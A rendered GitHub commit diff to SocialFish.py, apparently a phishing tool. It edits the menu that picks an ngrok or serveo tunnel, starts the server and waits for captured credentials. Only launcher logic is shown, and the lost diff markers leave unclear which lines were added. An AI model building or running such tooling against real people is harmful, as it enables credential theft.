Update SocialFish.py

This commit is contained in:
Usama Abdul Sattar 2018-08-09 08:12:15 +05:00 committed by GitHub
parent 5399be17cd
commit c67cc1914a
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23

View File

@ -330,8 +330,10 @@ if __name__ == "__main__":
choice = input(" \n {0}SF-An0nUD4Y > {1}".format(CYAN, END))
if choice == '1':
runNgrok()
elif choice == '2':
serveo()
else:
serveo()
return server()
server()
multiprocessing.Process(target=runServer).start()
waitCreds()